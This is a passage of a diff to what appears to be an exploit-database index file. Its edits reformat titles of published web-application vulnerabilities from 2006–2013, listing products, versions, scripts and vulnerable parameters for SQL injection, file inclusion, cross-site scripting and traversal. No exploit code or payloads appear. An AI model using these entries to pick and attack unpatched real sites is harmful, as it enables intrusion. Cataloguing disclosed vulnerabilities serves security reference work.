Inclusion",2006-09-29,"RaVeR shi mozi",php,webapps,0 28708,platforms/php/webapps/28708.txt,"elproLOG MONITOR Webaccess 2.1 - Multiple Vulnerabilities",2013-10-04,Vulnerability-Lab,php,webapps,80 28709,platforms/php/webapps/28709.txt,"FlashChat 6.0.2 < 6.0.8 - Arbitrary File Upload",2013-10-04,x-hayben21,php,webapps,80 @@ -30725,14 +30726,14 @@ id,file,description,date,author,platform,type,port 28719,platforms/php/webapps/28719.txt,"Joomla! Component VirtueMart Joomla! eCommerce Edition 1.0.11 - Multiple Input Validation Vulnerabilities",2006-09-27,"Adrian Castro",php,webapps,0 28720,platforms/php/webapps/28720.txt,"Web//News 1.4 - 'parser.php' Remote File Inclusion (2)",2006-09-27,ThE-WoLf-KsA,php,webapps,0 28721,platforms/php/webapps/28721.txt,"Red Mombin 0.7 - 'index.php' Unspecified Cross-Site Scripting",2006-09-22,"Armorize Technologies",php,webapps,0 -28722,platforms/php/webapps/28722.txt,"Red Mombin 0.7 - process_login.php Unspecified Cross-Site Scripting",2006-09-22,"Armorize Technologies",php,webapps,0 +28722,platforms/php/webapps/28722.txt,"Red Mombin 0.7 - 'process_login.php' Unspecified Cross-Site Scripting",2006-09-22,"Armorize Technologies",php,webapps,0 28723,platforms/php/webapps/28723.txt,"Aanval 7.1 build 70151 - Multiple Vulnerabilities",2013-10-04,xistence,php,webapps,80 28736,platforms/php/webapps/28736.txt,"DeluxeBB 1.09 - 'Sig.php' Remote File Inclusion",2006-10-02,r0ut3r,php,webapps,0 28737,platforms/php/webapps/28737.txt,"PHP Web Scripts Easy Banner - 'functions.php' Remote File Inclusion",2006-10-02,"abu ahmed",php,webapps,0 28738,platforms/php/webapps/28738.txt,"Digishop 4.0 - 'cart.php' Cross-Site Scripting",2006-10-02,meto5757,php,webapps,0 -28740,platforms/php/webapps/28740.txt,"HAMweather 3.9.8 - template.php Script Code Injection",2006-10-03,"James Bercegay",php,webapps,0 +28740,platforms/php/webapps/28740.txt,"HAMweather 3.9.8 - 'template.php' Script Code Injection",2006-10-03,"James Bercegay",php,webapps,0 28741,platforms/php/webapps/28741.txt,"Yener Haber Script 1.0/2.0 - SQL Injection",2006-10-04,Dj_ReMix,php,webapps,0 -28742,platforms/asp/webapps/28742.txt,"ASPPlayGround.NET Forum 2.4.5 - Calendar.asp Cross-Site Scripting",2006-10-27,MizoZ,asp,webapps,0 +28742,platforms/asp/webapps/28742.txt,"ASPPlayGround.NET Forum 2.4.5 - 'Calendar.asp' Cross-Site Scripting",2006-10-27,MizoZ,asp,webapps,0 28743,platforms/php/webapps/28743.txt,"osCommerce 2.2 - '/admin/banner_manager.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 28744,platforms/php/webapps/28744.txt,"osCommerce 2.2 - '/admin/banner_statistics.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 28745,platforms/php/webapps/28745.txt,"osCommerce 2.2 - '/admin/countries.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 @@ -30750,7 +30751,7 @@ id,file,description,date,author,platform,type,port 28761,platforms/php/webapps/28761.txt,"WikyBlog 1.2.x - 'index.php' Remote File Inclusion",2006-10-05,MoHaNdKo,php,webapps,0 28762,platforms/asp/webapps/28762.txt,"Civica - 'Display.asp' SQL Injection",2006-10-05,CodeXpLoder'tq,asp,webapps,0 28767,platforms/php/webapps/28767.txt,"AckerTodo 4.2 - 'login.php' Multiple SQL Injections",2006-10-06,"Francesco Laurita",php,webapps,0 -28768,platforms/asp/webapps/28768.html,"Emek Portal 2.1 - Uyegiris.asp SQL Injection",2006-10-06,"Dj ReMix",asp,webapps,0 +28768,platforms/asp/webapps/28768.html,"Emek Portal 2.1 - 'Uyegiris.asp' SQL Injection",2006-10-06,"Dj ReMix",asp,webapps,0 28769,platforms/php/webapps/28769.txt,"Interspire FastFind - 'index.php' Cross-Site Scripting",2006-09-27,MizoZ,php,webapps,0 28770,platforms/php/webapps/28770.txt,"Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection",2006-10-08,disfigure,php,webapps,0 28771,platforms/php/webapps/28771.pl,"PHP Polling Creator 1.03 - 'functions.inc.php' Remote File Inclusion",2006-10-08,ThE-WoLf-KsA,php,webapps,0 @@ -30770,8 +30771,8 @@ id,file,description,date,author,platform,type,port 28787,platforms/php/webapps/28787.txt,"Dokeos 1.6.4 - Multiple Remote File Inclusions Vulnerabilities",2006-10-11,viper-haCker,php,webapps,0 28790,platforms/php/webapps/28790.txt,"phpList 2.x - Public Pages MultipleCross-Site Scripting Vulnerabilities",2006-10-12,"Michiel Dethmers",php,webapps,0 28791,platforms/php/webapps/28791.txt,"PHP TopSites FREE 1.022b - 'config.php' Remote File Inclusion",2006-10-12,"Le CoPrA",php,webapps,0 -28792,platforms/php/webapps/28792.txt,"MamboLaiThai ExtCalThai 0.9.1 - 'admin_events.php CONFIG_EXT[LANGUAGES_DIR]' Remote File Inclusion",2006-10-12,k1tk4t,php,webapps,0 -28793,platforms/php/webapps/28793.txt,"MamboLaiThai ExtCalThai 0.9.1 - 'mail.inc.php CONFIG_EXT[LIB_DIR]' Remote File Inclusion",2006-10-12,k1tk4t,php,webapps,0 +28792,platforms/php/webapps/28792.txt,"MamboLaiThai ExtCalThai 0.9.1 - 'admin_events.php?CONFIG_EXT[LANGUAGES_DIR]' Remote File Inclusion",2006-10-12,k1tk4t,php,webapps,0 +28793,platforms/php/webapps/28793.txt,"MamboLaiThai ExtCalThai 0.9.1 - 'mail.inc.php?CONFIG_EXT[LIB_DIR]' Remote File Inclusion",2006-10-12,k1tk4t,php,webapps,0 28794,platforms/php/webapps/28794.txt,"4Images 1.7 - 'details.php' Cross-Site Scripting",2006-10-12,"Christian Marthen",php,webapps,0 28795,platforms/php/webapps/28795.php,"FreeWPS 2.11 - 'upload.php' Remote Command Execution",2006-10-12,"HACKERS PAL",php,webapps,0 28796,platforms/php/webapps/28796.pl,"Buzlas 2006-1 Full - 'Archive_Topic.php' Remote File Inclusion",2006-09-29,"Nima Salehi",php,webapps,0 @@ -30794,10 +30795,10 @@ id,file,description,date,author,platform,type,port 28823,platforms/php/webapps/28823.pl,"PowerMovieList 0.13/0.14 - Edit User HTML Injection",2006-10-16,MP,php,webapps,0 28824,platforms/php/webapps/28824.txt,"phpList 2.10.2 - 'index.php' Cross-Site Scripting",2006-10-17,b0rizQ,php,webapps,0 28825,platforms/php/webapps/28825.txt,"Dev Web Manager System 1.5 - 'index.php' Cross-Site Scripting",2006-10-17,CorryL,php,webapps,0 -28826,platforms/php/webapps/28826.txt,"Cerberus Helpdesk 3.2.1 - Rpc.php Unauthorized Access",2006-10-18,jonepet,php,webapps,0 +28826,platforms/php/webapps/28826.txt,"Cerberus Helpdesk 3.2.1 - 'Rpc.php' Unauthorized Access",2006-10-18,jonepet,php,webapps,0 28827,platforms/php/webapps/28827.txt,"PHP Live Helper 1.17 - Multiple Remote File Inclusions",2006-10-18,Matdhule,php,webapps,0 28828,platforms/php/webapps/28828.txt,"Zorum 3.5 - 'DBProperty.php' Remote File Inclusion",2006-10-19,MoHaNdKo,php,webapps,0 -28829,platforms/asp/webapps/28829.txt,"Kinesis Interactive Cinema System - index.asp SQL Injection",2006-10-18,fireboy,asp,webapps,0 +28829,platforms/asp/webapps/28829.txt,"Kinesis Interactive Cinema System - 'index.asp' SQL Injection",2006-10-18,fireboy,asp,webapps,0 28830,platforms/php/webapps/28830.pl,"Free FAQ 1.0 - 'index.php' Remote File Inclusion",2006-10-19,"Alireza Ahari",php,webapps,0 28831,platforms/php/webapps/28831.txt,"Simple Machines Forum (SMF) 1.0/1.1 - 'index.php' Cross-Site Scripting",2006-10-19,b0rizQ,php,webapps,0 28832,platforms/php/webapps/28832.txt,"ATutor 1.5.3 - Multiple Remote File Inclusions",2006-10-19,SuBzErO,php,webapps,0 @@ -30807,15 +30808,15 @@ id,file,description,date,author,platform,type,port 28840,platforms/php/webapps/28840.txt,"SchoolAlumni Portal 2.26 - 'mod.php?mod' Traversal Local File Inclusion",2006-10-23,MP,php,webapps,0 28842,platforms/php/webapps/28842.txt,"Zwahlen's Online Shop 5.2.2 - 'Cat' Cross-Site Scripting",2006-10-23,MC.Iglo,php,webapps,0 28843,platforms/php/webapps/28843.txt,"cPanel 10.9 - dosetmytheme 'theme' Cross-Site Scripting",2006-10-23,Crackers_Child,php,webapps,0 -28844,platforms/php/webapps/28844.txt,"cPanel 10.9 - editzonetemplate template Parameter Cross-Site Scripting",2006-10-23,Crackers_Child,php,webapps,0 +28844,platforms/php/webapps/28844.txt,"cPanel 10.9 - 'editzonetemplate?template' Cross-Site Scripting",2006-10-23,Crackers_Child,php,webapps,0 28845,platforms/php/webapps/28845.txt,"Shop-Script - Multiple HTTP Response Splitting Vulnerabilities",2006-10-23,"Debasis Mohanty",php,webapps,0 -28846,platforms/php/webapps/28846.html,"WikiNi 0.4.x - Waka.php Multiple HTML Injection Vulnerabilities",2006-10-23,"Raphael Huck",php,webapps,0 +28846,platforms/php/webapps/28846.html,"WikiNi 0.4.x - 'Waka.php' Multiple HTML Injection Vulnerabilities",2006-10-23,"Raphael Huck",php,webapps,0 28851,platforms/php/webapps/28851.txt,"Crafty Syntax Live Help 2.9.9 - Multiple Remote File Inclusions",2006-10-24,Crackers_Child,php,webapps,0 28854,platforms/multiple/webapps/28854.txt,"Imperva SecureSphere Web Application Firewall MX 9.5.6 - Blind SQL Injection",2013-10-10,"Giuseppe D'Amore",multiple,webapps,0 -28857,platforms/asp/webapps/28857.txt,"Snitz Forums 2000 3.4.6 - Pop_Mail.asp SQL Injection",2006-10-24,"Arham Muhammad",asp,webapps,0 +28857,platforms/asp/webapps/28857.txt,"Snitz Forums 2000 3.4.6 - 'Pop_Mail.asp' SQL Injection",2006-10-24,"Arham Muhammad",asp,webapps,0 28858,platforms/php/webapps/28858.txt,"Simpnews 2.x - 'index.php' Cross-Site Scripting",2006-10-24,security@vigilon.com,php,webapps,0 28859,platforms/php/webapps/28859.txt,"Simpnews 2.x - 'pwlost.php' Cross-Site Scripting",2006-10-24,security@vigilon.com,php,webapps,0 -28861,platforms/php/webapps/28861.txt,"Comment IT 0.2 - PathToComment Parameter Remote File Inclusion",2006-10-25,"Cold Zero",php,webapps,0 +28861,platforms/php/webapps/28861.txt,"Comment IT 0.2 - 'PathToComment' Remote File Inclusion",2006-10-25,"Cold Zero",php,webapps,0 28862,platforms/php/webapps/28862.txt,"PHPMyConferences 8.0.2 - 'Init.php' Remote File Inclusion",2006-10-25,The-0utl4w,php,webapps,0 28863,platforms/php/webapps/28863.txt,"MAXdev MD-Pro 1.0.76 - 'user.php' Cross-Site Scripting",2006-10-26,r00t,php,webapps,0 28864,platforms/php/webapps/28864.txt,"PHPLeague 0.81 - '/consult/miniseul.php?cheminmini' Remote File Inclusion",2006-10-26,ajaan,php,webapps,0 @@ -30823,7 +30824,7 @@ id,file,description,date,author,platform,type,port 28866,platforms/php/webapps/28866.txt,"IG Shop 1.4 - 'Change_Pass.php' Cross-Site Scripting",2006-10-30,SnipEr.X,php,webapps,0 28867,platforms/php/webapps/28867.txt,"TorrentFlux 2.1 - 'dir.php' Directory Traversal",2006-10-27,Christopher,php,webapps,0 28868,platforms/php/webapps/28868.txt,"PLS-Bannieres 1.21 - 'Bannieres.php' Remote File Inclusion",2006-10-27,Mahmood_ali,php,webapps,0 -28869,platforms/asp/webapps/28869.txt,"Web Wiz Forum 6.34/7.x - search.asp SQL Injection",2006-10-28,almaster,asp,webapps,0 +28869,platforms/asp/webapps/28869.txt,"Web Wiz Forum 6.34/7.x - 'search.asp' SQL Injection",2006-10-28,almaster,asp,webapps,0 28870,platforms/php/webapps/28870.txt,"PunBB 1.x - SQL Injection",2006-10-30,nmsh_sa,php,webapps,0 28871,platforms/php/webapps/28871.txt,"Actionpoll 1.1.1 - '/db/DataReaderWriter.php?CONFIG_DB' Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 28872,platforms/php/webapps/28872.txt,"Actionpoll 1.1.1 - '/db/PollDB.php?CONFIG_DATAREADERWRITER' Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 @@ -30840,7 +30841,7 @@ id,file,description,date,author,platform,type,port 28889,platforms/php/webapps/28889.txt,"Netquery 4.0 - 'NQUser.php' Cross-Site Scripting",2006-10-31,"Tal Argoni",php,webapps,0 28890,platforms/php/webapps/28890.txt,"iPlanet Messaging Server - Messenger Express Expression() HTML Injection",2006-10-31,LegendaryZion,php,webapps,0 28891,platforms/php/webapps/28891.txt,"Mirapoint Web Mail - 'Expression()' HTML Injection",2006-10-31,LegendaryZion,php,webapps,0 -28892,platforms/php/webapps/28892.txt,"RSSonate - Project_Root Parameter Remote File Inclusion",2006-11-01,Arab4services,php,webapps,0 +28892,platforms/php/webapps/28892.txt,"RSSonate - 'Project_Root' Remote File Inclusion",2006-11-01,Arab4services,php,webapps,0 28893,platforms/php/webapps/28893.pl,"KnowledgeBuilder 2.2 - 'visEdit_Control.Class.php' Remote File Inclusion",2006-11-08,igi,php,webapps,0 28896,platforms/php/webapps/28896.txt,"RunCMS 1.x - Avatar Arbitrary File Upload",2006-11-02,securfrog,php,webapps,0 28898,platforms/php/webapps/28898.txt,"FreeWebShop 2.2 - 'index.php' SQL Injection",2006-11-02,Spiked,php,webapps,0 @@ -30851,7 +30852,7 @@ id,file,description,date,author,platform,type,port 28903,platforms/php/webapps/28903.txt,"ac4p Mobile - 'send.php?cats' Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0 28904,platforms/php/webapps/28904.txt,"ac4p Mobile - 'up.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-03,AL-garnei,php,webapps,0 28905,platforms/php/webapps/28905.txt,"ac4p Mobile - '/cp/index.php?pagenav' Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0 -28906,platforms/php/webapps/28906.txt,"Simplog 0.9.3 - BlogID Parameter Multiple SQL Injections",2006-11-03,"Benjamin Moss",php,webapps,0 +28906,platforms/php/webapps/28906.txt,"Simplog 0.9.3 - 'BlogID' Multiple SQL Injections",2006-11-03,"Benjamin Moss",php,webapps,0 28907,platforms/php/webapps/28907.txt,"Simplog 0.9.3 - 'archive.php?PID' Cross-Site Scripting",2006-11-03,"Benjamin Moss",php,webapps,0 28908,platforms/php/webapps/28908.txt,"Advanced Guestbook 2.3.1 - 'admin.php' Remote File Inclusion",2006-11-03,BrokeN-ProXy,php,webapps,0 28909,platforms/php/webapps/28909.txt,"IF-CMS - 'index.php' Cross-Site Scripting",2006-11-04,"Benjamin Moss",php,webapps,0 @@ -30882,14 +30883,14 @@ id,file,description,date,author,platform,type,port 28938,platforms/php/webapps/28938.txt,"IPManager 2.3 - 'index.php' Cross-Site Scripting",2006-11-07,spaceballyopsolo,php,webapps,0 28939,platforms/php/webapps/28939.txt,"Kayako SupportSuite 3.0.32 - 'index.php' Cross-Site Scripting",2006-11-07,Dr.HAiL,php,webapps,0 28940,platforms/php/webapps/28940.txt,"PHPMyChat 0.14/0.15 - 'Languages.Lib.php' Local File Inclusion",2006-11-08,ajann,php,webapps,0 -28941,platforms/asp/webapps/28941.txt,"Immediacy .NET CMS 5.2 - Logon.aspx Cross-Site Scripting",2006-11-08,"Gemma Hughes",asp,webapps,0 -28942,platforms/php/webapps/28942.txt,"FreeWebShop 2.1/2.2 - 'index.php' page Parameter Traversal Arbitrary File Access",2006-11-08,"laurent gaffie",php,webapps,0 -28943,platforms/php/webapps/28943.txt,"FreeWebShop 2.1/2.2 - 'index.php' cat Parameter Cross-Site Scripting",2006-11-08,"laurent gaffie",php,webapps,0 +28941,platforms/asp/webapps/28941.txt,"Immediacy .NET CMS 5.2 - 'Logon.aspx' Cross-Site Scripting",2006-11-08,"Gemma Hughes",asp,webapps,0 +28942,platforms/php/webapps/28942.txt,"FreeWebShop 2.1/2.2 - 'index.php?page' Traversal Arbitrary File Access",2006-11-08,"laurent gaffie",php,webapps,0 +28943,platforms/php/webapps/28943.txt,"FreeWebShop 2.1/2.2 - 'index.php?cat' Cross-Site Scripting",2006-11-08,"laurent gaffie",php,webapps,0 28944,platforms/php/webapps/28944.txt,"Abarcar Realty Portal 5.1.5/6.0.1 - Multiple SQL Injections",2006-11-08,"Benjamin Moss",php,webapps,0 28945,platforms/php/webapps/28945.txt,"PHPMyChat Plus 1.9 - Multiple Local File Inclusions",2006-11-08,ajann,php,webapps,0 28946,platforms/php/webapps/28946.txt,"Portix-PHP 0.4.2 - Multiple SQL Injections",2006-11-08,"Benjamin Moss",php,webapps,0 28947,platforms/php/webapps/28947.txt,"Speedywiki 2.0/2.1 - Multiple Input Validation Vulnerabilities",2006-11-08,"laurent gaffie",php,webapps,0 -28949,platforms/php/webapps/28949.txt,"bitweaver 1.x - '/newsletters/edition.php' tk Parameter SQL Injection",2006-11-09,"laurent gaffie",php,webapps,0 +28949,platforms/php/webapps/28949.txt,"bitweaver 1.x - '/newsletters/edition.php?tk' SQL Injection",2006-11-09,"laurent gaffie",php,webapps,0 28950,platforms/php/webapps/28950.txt,"LandShop 0.6.3 - 'ls.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-09,"laurent gaffie",php,webapps,0 28951,platforms/php/webapps/28951.txt,"LandShop 0.6.3 - 'ls.php' Multiple SQL Injections",2006-11-09,"laurent gaffie",php,webapps,0 28952,platforms/php/webapps/28952.txt,"Omnistar Article Manager - Multiple SQL Injections",2006-11-09,"Benjamin Moss",php,webapps,0 @@ -30912,10 +30913,10 @@ id,file,description,date,author,platform,type,port 28978,platforms/ios/webapps/28978.txt,"Apple iOS 7.0.2 - Sim Lock Screen Display Bypass",2013-10-15,Vulnerability-Lab,ios,webapps,0 28979,platforms/linux/webapps/28979.txt,"DornCMS Application 1.4 - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,linux,webapps,0 28980,platforms/php/webapps/28980.txt,"WordPress 2.0.5 - 'functions.php' Remote File Inclusion",2006-11-11,_ANtrAX_,php,webapps,0 -28982,platforms/php/webapps/28982.txt,"cPanel 10 - seldir.html dir Parameter Cross-Site Scripting",2006-11-13,"Aria-Security Team",php,webapps,0 +28982,platforms/php/webapps/28982.txt,"cPanel 10 - 'seldir.html?dir' Cross-Site Scripting",2006-11-13,"Aria-Security Team",php,webapps,0 28983,platforms/php/webapps/28983.txt,"cPanel 10 - 'newuser.html' Multiple Cross-Site Scripting Vulnerabilities",2006-11-13,"Aria-Security Team",php,webapps,0 -28985,platforms/asp/webapps/28985.txt,"20/20 Real Estate 3.2 - listings.asp SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps,0 -28986,platforms/asp/webapps/28986.asp,"ASP Portal 2.0/3.x/4.0 - Default1.asp SQL Injection",2006-11-13,ajann,asp,webapps,0 +28985,platforms/asp/webapps/28985.txt,"20/20 Real Estate 3.2 - 'listings.asp' SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps,0 +28986,platforms/asp/webapps/28986.asp,"ASP Portal 2.0/3.x/4.0 - 'Default1.asp' SQL Injection",2006-11-13,ajann,asp,webapps,0 28988,platforms/php/webapps/28988.txt,"Roundcube Webmail 0.1 - 'index.php' Cross-Site Scripting",2006-11-13,RSnake,php,webapps,0 28989,platforms/asp/webapps/28989.txt,"INFINICART - 'search.asp?search' Cross-Site Scripting",2006-11-13,"laurent gaffie",asp,webapps,0 28990,platforms/asp/webapps/28990.txt,"INFINICART - 'sendpassword.asp?email' Cross-Site Scripting",2006-11-13,"laurent gaffie",asp,webapps,0 @@ -30939,23 +30940,23 @@ id,file,description,date,author,platform,type,port 29004,platforms/php/webapps/29004.txt,"DirectAdmin 1.28/1.29 - 'CMD_EMAIL_VACATION_MODIFY' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0 29005,platforms/php/webapps/29005.txt,"DirectAdmin 1.28/1.29 - 'CMD_EMAIL_LIST' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0 29006,platforms/php/webapps/29006.txt,"DirectAdmin 1.28/1.29 - 'CMD_FTP_SHOW' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0 -29008,platforms/asp/webapps/29008.txt,"FunkyASP Glossary 1.0 - Glossary.asp SQL Injection",2006-11-14,saps.audit,asp,webapps,0 +29008,platforms/asp/webapps/29008.txt,"FunkyASP Glossary 1.0 - 'Glossary.asp' SQL Injection",2006-11-14,saps.audit,asp,webapps,0 29009,platforms/asp/webapps/29009.txt,"SitesOutlet eCommerce Kit - Multiple SQL Injections",2006-11-15,"laurent gaffie",asp,webapps,0 -29010,platforms/asp/webapps/29010.txt,"SiteXpress E-Commerce System - Dept.asp SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps,0 -29011,platforms/asp/webapps/29011.txt,"ASPIntranet 2.1 - default.asp SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps,0 -29012,platforms/asp/webapps/29012.txt,"DMXReady Site Engine Manager 1.0 - index.asp SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps,0 -29013,platforms/asp/webapps/29013.txt,"Pilot Cart 7.2 - Pilot.asp SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 +29010,platforms/asp/webapps/29010.txt,"SiteXpress E-Commerce System - 'Dept.asp' SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps,0 +29011,platforms/asp/webapps/29011.txt,"ASPIntranet 2.1 - 'default.asp' SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps,0 +29012,platforms/asp/webapps/29012.txt,"DMXReady Site Engine Manager 1.0 - 'index.asp' SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps,0 +29013,platforms/asp/webapps/29013.txt,"Pilot Cart 7.2 - 'Pilot.asp' SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 29014,platforms/asp/webapps/29014.txt,"Car Site Manager - '/csm/asp/listings.asp' Multiple SQL Injections",2006-11-14,"laurent gaffie",asp,webapps,0 29015,platforms/asp/webapps/29015.txt,"Car Site Manager - '/csm/asp/detail.asp?p' SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 29016,platforms/asp/webapps/29016.txt,"Car Site Manager - '/csm/asp/listings.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-11-14,"laurent gaffie",asp,webapps,0 29017,platforms/php/webapps/29017.txt,"Plesk 7.5/8.0 - 'get_password.php' Cross-Site Scripting",2006-11-14,"David Vieira-Kurz",php,webapps,0 -29018,platforms/php/webapps/29018.txt,"Plesk 7.5/8.0 - login_up.php3 Cross-Site Scripting",2006-11-14,"David Vieira-Kurz",php,webapps,0 +29018,platforms/php/webapps/29018.txt,"Plesk 7.5/8.0 - 'login_up.php3' Cross-Site Scripting",2006-11-14,"David Vieira-Kurz",php,webapps,0 29019,platforms/php/webapps/29019.txt,"Zikula CMS 1.3.5 - Multiple Vulnerabilities",2013-10-17,Vulnerability-Lab,php,webapps,0 29020,platforms/php/webapps/29020.txt,"WordPress Plugin Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting",2013-10-17,Zy0d0x,php,webapps,80 29021,platforms/php/webapps/29021.txt,"WordPress Plugin Realty - Blind SQL Injection",2013-10-17,Napsterakos,php,webapps,80 29023,platforms/php/webapps/29023.txt,"Woltlab Burning Board Regenbogenwiese 2007 Addon - SQL Injection",2013-10-17,"Easy Laster",php,webapps,0 29024,platforms/asp/webapps/29024.txt,"Inventory Manager - Multiple Input Validation Vulnerabilities",2006-11-14,"laurent gaffie",asp,webapps,0 -29025,platforms/asp/webapps/29025.txt,"Evolve Merchant - viewcart.asp SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 +29025,platforms/asp/webapps/29025.txt,"Evolve Merchant - 'viewcart.asp' SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 29026,platforms/php/webapps/29026.txt,"Mega Mall - 'product_review.php' Multiple SQL Injections",2006-11-14,"laurent gaffie",php,webapps,0 29027,platforms/php/webapps/29027.txt,"Mega Mall - 'order-track.php?orderNo' SQL Injection",2006-11-14,"laurent gaffie",php,webapps,0 29028,platforms/asp/webapps/29028.txt,"MGinternet Property Site Manager - 'listings.asp?s' Cross-Site Scripting",2006-11-14,"laurent gaffie",asp,webapps,0 @@ -30998,7 +30999,7 @@ id,file,description,date,author,platform,type,port 29075,platforms/asp/webapps/29075.txt,"20/20 Auto Gallery 3.2 - Multiple SQL Injections",2006-11-17,"laurent gaffie",asp,webapps,0 29077,platforms/asp/webapps/29077.txt,"20/20 Applications Data Shed 1.0 - 'f-email.asp?itemID' SQL Injection",2006-11-17,"laurent gaffie",asp,webapps,0 29078,platforms/asp/webapps/29078.txt,"20/20 Applications Data Shed 1.0 - 'listings.asp' Multiple SQL Injections",2006-11-17,"laurent gaffie",asp,webapps,0 -29079,platforms/php/webapps/29079.txt,"vBulletin 3.6.x - Admin Control Panel index.php Multiple Cross-Site Scripting Vulnerabilities",2006-11-17,insanity,php,webapps,0 +29079,platforms/php/webapps/29079.txt,"vBulletin 3.6.x - Admin Control Panel Multiple Cross-Site Scripting Vulnerabilities",2006-11-17,insanity,php,webapps,0 29080,platforms/asp/webapps/29080.txt,"BestWebApp Dating Site Login Component - Multiple Field SQL Injections",2006-11-17,"laurent gaffie",asp,webapps,0 29081,platforms/asp/webapps/29081.txt,"BestWebApp Dating Site - 'login_form.asp?msg' Cross-Site Scripting",2006-11-17,"laurent gaffie",asp,webapps,0 29085,platforms/asp/webapps/29085.txt,"Alan Ward A-CART 2.0 - 'category.asp?catcode' SQL Injection (1)",2006-11-18,"laurent gaffie",asp,webapps,0 @@ -31055,63 +31056,63 @@ id,file,description,date,author,platform,type,port 29141,platforms/asp/webapps/29141.txt,"The Classified Ad System 3.0 - 'default.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-11-20,"laurent gaffie",asp,webapps,0 29142,platforms/asp/webapps/29142.txt,"Klf-Realty 2.0 - 'search_listing.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",asp,webapps,0 29143,platforms/asp/webapps/29143.txt,"Klf-Realty 2.0 - 'detail.asp?property_id' SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29145,platforms/php/webapps/29145.txt,"Wabbit PHP Gallery 0.9 - Dir Parameter Directory Traversal",2006-11-20,the_Edit0r,php,webapps,0 +29145,platforms/php/webapps/29145.txt,"Wabbit PHP Gallery 0.9 - 'Dir' Directory Traversal",2006-11-20,the_Edit0r,php,webapps,0 29162,platforms/php/webapps/29162.txt,"My Little Weblog 2006.11.21 - 'Weblog.php' Cross-Site Scripting",2006-11-21,the_Edit0r,php,webapps,0 29217,platforms/php/webapps/29217.txt,"CuteNews 1.3.6 - 'result' Cross-Site Scripting",2006-12-02,Detefix,php,webapps,0 29218,platforms/php/webapps/29218.txt,"PHPNews 1.3 - 'Link_Temp.php' Cross-Site Scripting",2006-12-02,Detefix,php,webapps,0 29219,platforms/asp/webapps/29219.txt,"DUdownload 1.0/1.1 - 'detail.asp' Multiple SQL Injections",2006-12-02,"Aria-Security Team",asp,webapps,0 -29220,platforms/asp/webapps/29220.html,"Metyus Okul Yonetim 1.0 - Sistemi Uye_giris_islem.asp SQL Injection",2006-12-04,ShaFuck31,asp,webapps,0 +29220,platforms/asp/webapps/29220.html,"Metyus Okul Yonetim 1.0 - 'Sistemi Uye_giris_islem.asp' SQL Injection",2006-12-04,ShaFuck31,asp,webapps,0 29165,platforms/php/webapps/29165.txt,"PMOS Help Desk 2.3 - 'ticketview.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-22,SwEET-DeViL,php,webapps,0 29166,platforms/php/webapps/29166.txt,"PMOS Help Desk 2.3 - 'ticket.php?email' Cross-Site Scripting",2006-11-22,SwEET-DeViL,php,webapps,0 29992,platforms/php/webapps/29992.txt,"Campsite 2.6.1 - 'SubscriptionSection.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29993,platforms/php/webapps/29993.txt,"Campsite 2.6.1 - 'SystemPref.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29216,platforms/asp/webapps/29216.html,"Aspee Ziyaretci Defteri - giris.asp Multiple Field SQL Injections",2006-12-01,ShaFuq31,asp,webapps,0 +29216,platforms/asp/webapps/29216.html,"Aspee Ziyaretci Defteri - 'giris.asp' Multiple Field SQL Injections",2006-12-01,ShaFuq31,asp,webapps,0 29173,platforms/php/webapps/29173.txt,"Active PHP BookMarks 1.1.2 - Multiple Remote File Inclusions",2006-11-23,ThE-LoRd-Of-CrAcKiNg,php,webapps,0 29174,platforms/asp/webapps/29174.txt,"MidiCart ASP - 'Item_Show.asp?ID2006quant' SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 29175,platforms/php/webapps/29175.txt,"Simple PHP Gallery 1.1 - 'System SP_Index.php' Cross-Site Scripting",2006-11-24,"Al7ejaz Hacker",php,webapps,0 -29176,platforms/asp/webapps/29176.txt,"ASP ListPics 5.0 - Listpics.asp SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 +29176,platforms/asp/webapps/29176.txt,"ASP ListPics 5.0 - 'Listpics.asp' SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 29177,platforms/php/webapps/29177.txt,"MMGallery 1.55 - 'Thumbs.php' Cross-Site Scripting",2006-11-24,"Al7ejaz Hacker",php,webapps,0 29178,platforms/asp/webapps/29178.txt,"Fixit iDms Pro Image Gallery - 'filelist.asp' Multiple SQL Injections",2006-11-24,"Aria-Security Team",asp,webapps,0 29179,platforms/asp/webapps/29179.txt,"Fixit iDms Pro Image Gallery - 'showfile.asp?fid' SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 29180,platforms/asp/webapps/29180.txt,"SIAP CMS - 